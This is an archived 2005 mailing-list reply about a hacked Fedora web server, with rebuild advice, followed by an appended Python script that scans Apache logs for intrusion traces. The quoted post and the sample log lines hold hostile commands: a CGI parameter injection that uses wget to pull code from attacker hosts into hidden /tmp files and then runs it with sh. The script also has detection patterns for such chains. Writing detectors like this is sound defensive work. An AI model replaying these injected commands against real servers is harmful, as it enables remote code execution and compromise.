Server compromised

Leonard Isham leonard.isham at gmail.com
Fri Feb 18 14:51:19 UTC 2005


On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
<paul at topguncomputers.com> wrote:
> Apparently someone has hacked into my webserver.  And is installing perl
> scripts into the /tmp/ directory.  They're usually named .linuxday* or
> .cinta* and a few other names as well.
> 
> From what I can tell something is causing apache to run a command like "sh
> wget  bot.linuxday.com.br -O {the above mentioned files are then listed}"
> 
> sometimes the site is worm.linuxday.com.br
> 
> I'm curious if anyone has heard about this before.  I'm currently running
> Fedora 1 with all the latest security patches.

The only way to ensure your system is clean, and likely to remain clean, is to:

1. Do a bare metal install
2. Change all passwords to new strong passwords
3. Disable cleartext services, ftp, telnet, rsh, etc.
4. Disable root remote login (use su or sudo)
5. Restore your uncompromised data
6. etc.

I had to do this for a client and the next 3 days the intruder tried
to get back in.

-- 
Leonard Isham, CISSP 
Ostendo non ostento.
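Before the rebuild, it helps to confirm how the downloads were being triggered. The following is an added example, not code from either poster: it scans Apache access-log lines for the download-and-run chain described above (a `wget` from the named hosts, written as a hidden file under /tmp, then fed to `sh`). The log lines are constructed for illustration; only the two hostnames come from the post, and the `view.cgi` script and parameter names are hypothetical.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original thread). The two
# hostnames are the ones reported in the post; everything else is made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Feb/2005:22:10:01 -0800] "GET /index.html HTTP/1.1" 200 1043',
    '10.0.0.9 - - [17/Feb/2005:22:11:14 -0800] "GET /cgi-bin/view.cgi?f=x;cd%20/tmp;wget%20bot.linuxday.com.br/x%20-O%20.linuxday1;sh%20.linuxday1 HTTP/1.0" 200 88',
    '10.0.0.7 - - [17/Feb/2005:22:12:30 -0800] "GET /about.html HTTP/1.1" 200 2210',
    '10.0.0.9 - - [17/Feb/2005:22:15:02 -0800] "GET /cgi-bin/view.cgi?f=x;wget%20worm.linuxday.com.br/y%20-O%20/tmp/.cinta HTTP/1.0" 200 88',
    '10.0.0.9 - - [17/Feb/2005:22:16:40 -0800] "GET /cgi-bin/view.cgi?f=x;wget%20203.0.113.5/z%20-O%20/tmp/.foo;sh%20/tmp/.foo HTTP/1.0" 200 88',
]

# Indicators taken from the post: downloads pulled from these hosts, dropped as
# hidden files under /tmp, then executed with sh.
KNOWN_HOSTS = ("bot.linuxday.com.br", "worm.linuxday.com.br")
# Generic form of the same chain, for hosts the post does not name:
# a shell/download command at the start of a shell token ...
SHELL_PATTERN = re.compile(r"(?:^|[;&|`\s])(?:wget|curl|sh|perl)\b")
# ... writing its output to a dot-file, optionally under /tmp.
TMP_DROP = re.compile(r"(?:-O\s+|>\s*)(?:/tmp/)?\.\w+")

def request_path(line):
    """Return the request target from a common/combined-format log line, or None."""
    m = re.search(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/', line)
    return m.group(1) if m else None

def suspicious(line):
    """True when the URL-decoded request carries a download-and-run chain."""
    path = request_path(line)
    if path is None:
        return False
    decoded = unquote(path)  # %20 -> space, so the shell chain becomes visible
    if any(host in decoded for host in KNOWN_HOSTS):
        return True
    return bool(SHELL_PATTERN.search(decoded) and TMP_DROP.search(decoded))

def scan(lines):
    """Return (line_number, client_ip, decoded_request) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        if suspicious(line):
            hits.append((n, line.split()[0], unquote(request_path(line))))
    return hits

if __name__ == "__main__":
    for n, ip, req in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {req}")
```

The hits point at the vulnerable script and the client addresses, which is what you want to know before deciding what not to carry over from the compromised box.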